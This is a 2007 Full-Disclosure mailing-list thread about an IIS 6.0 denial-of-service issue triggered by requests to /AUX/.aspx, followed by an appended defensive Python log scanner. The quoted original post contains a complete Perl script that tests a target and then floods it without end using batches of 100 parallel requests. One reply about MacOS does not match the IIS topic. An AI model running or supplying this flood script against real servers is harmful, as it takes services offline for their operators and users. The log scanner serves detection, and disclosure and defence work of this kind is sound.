MacOS 10.2.8 also appears to be invulnerable to this. When I attempt to exploit the bug on a default install, I get a 'connection refused' error.

Joey

On Tue, 22 May 2007 11:22:51 -0400 kingcope <[EMAIL PROTECTED]> wrote:
>Hello Stan,
>
>This is a good question. When I tested this on the latest
>Windows Server 2007 with IIS/6.0 locally there was nothing
>like a DoS. On different Windows Servers in the wild the effect
>was that the servers did not respond for about 5 minutes after
>sending the packets for ~20 seconds in many cases (also 5.0).
>Running the script for several minutes gave me an HTTPException
>on /. Perhaps this may be a configuration issue?
>
>
>Best Regards,
>
>kcope
>
>-----Original Message-----
>From: Stan Bubrouski [mailto:[EMAIL PROTECTED]
>Sent: Tuesday, May 22, 2007 5:07 PM
>To: kingcope
>Cc: [email protected]
>Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
>
>What version of the .NET framework is running on the server?
>1.1.x, 2.0.x, or 3.0.x?
>
>-sb
>
>On 5/22/07, kingcope <[EMAIL PROTECTED]> wrote:
>> Hello List,
>>
>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
>> When I request /AUX/.aspx the server takes a bit longer to respond than
>> normally. So I did write an automated script to see what happens if
>> I request this file several times at once. The result is that some servers
>> on the internet get quite instable, some do not. On some servers after I
>> stop the attack I get an exception that the Server is too busy/Unhandled
>> Exception on the wwwroot (/) path.
>> Can you/the list confirm that?
>>
>> Here is a lame testing script for this stuff:
>>
>> #When sending multiple parallel GET requests to a IIS 6.0 server requesting
>> #/AUX/.aspx the server gets instable and non responsive. This happens only
>> #to servers which respond a runtime error (System.Web.HttpException)
>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
>> #
>> #
>> #signed,
>> #Kingcope [EMAIL PROTECTED]
>> ##########################################################################
>> ###***********************************************************************
>> ###
>> ###
>> ###
>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
>> ### by Kingcope, May/2007
>> ### Better run this from a Linux system
>> ##########################################################################
>>
>> use IO::Socket;
>> use threads;
>>
>> if ($ARGV[0] eq "") { exit; }
>> my $host = $ARGV[0];
>>
>> $|=1;
>>
>> sub sendit {
>>     $sock = IO::Socket::INET->new(PeerAddr => $host,
>>                                   PeerPort => 'http(80)',
>>                                   Proto => 'tcp');
>>
>>     print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
>> }
>>
>> $sock = IO::Socket::INET->new(PeerAddr => $host,
>>                               PeerPort => 'http(80)',
>>                               Proto => 'tcp');
>>
>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection:close\r\n\r\n";
>>
>> $k=0;
>> while (<$sock>) {
>>     if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
>>         $k=1;
>>         last;
>>     }
>> }
>>
>> if ($k==0) {
>>     print "Server does not seem vulnerable to this attack.\n";
>>     exit;
>> }
>>
>> print "ATTACK!\n";
>>
>> while(1){
>>
>>     for (my $i=0;$i<=100;$i++) {
>>         $thr = threads->new(\&sendit);
>>         print "\r\r\r$i/100 ";
>>     }
>>
>>     foreach $thr (threads->list) {
>>         $thr->join;
>>     }
>> }
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
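
A defender-side check for the request pattern discussed in this thread, added here as an example and not part of any poster's message: it scans IIS W3C logs for bursts of requests whose path contains a reserved DOS device name. The thread only mentions /AUX/.aspx; covering the other device names, the per-minute threshold of 20, the function names and the sample log lines are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# The thread names only AUX; the other reserved DOS device names are an
# assumption added here as a generalization.
DEVICE = re.compile(r"^(?:AUX|CON|NUL|PRN|COM[1-9]|LPT[1-9])$", re.I)

def has_device_segment(uri_stem):
    """True if any path segment, ignoring its extension, is a device name."""
    for segment in unquote(uri_stem).split("/"):
        if DEVICE.match(segment.split(".", 1)[0]):
            return True
    return False

def parse_w3c(lines):
    """Yield one dict per request, taking column names from the #Fields: header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def flag_clients(lines, threshold=20):
    """Map client IP -> peak device-name requests in one minute, if >= threshold."""
    per_minute = Counter()
    for rec in parse_w3c(lines):
        if has_device_segment(rec.get("cs-uri-stem", "")):
            per_minute[(rec["c-ip"], rec["date"], rec["time"][:5])] += 1
    flagged = {}
    for (ip, _date, _minute), hits in per_minute.items():
        if hits >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), hits)
    return flagged

# Constructed sample log (documentation IP ranges), not taken from the thread.
SAMPLE = ["#Fields: date time c-ip cs-method cs-uri-stem sc-status time-taken"]
SAMPLE += ["2007-05-22 15:07:%02d 192.0.2.10 GET /AUX/.aspx 500 2300" % s
           for s in range(30)]
SAMPLE += ["2007-05-22 15:07:01 198.51.100.7 GET /default.aspx 200 15",
           "2007-05-22 15:07:02 198.51.100.7 GET /auxiliary/index.aspx 200 20"]

if __name__ == "__main__":
    for ip, hits in flag_clients(SAMPLE).items():
        print(f"{ip}: {hits} device-name requests in one minute")
```

The parser reads whatever columns the `#Fields:` header declares, so it works on logs with or without `time-taken` as long as `date`, `time`, `c-ip` and `cs-uri-stem` are enabled.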
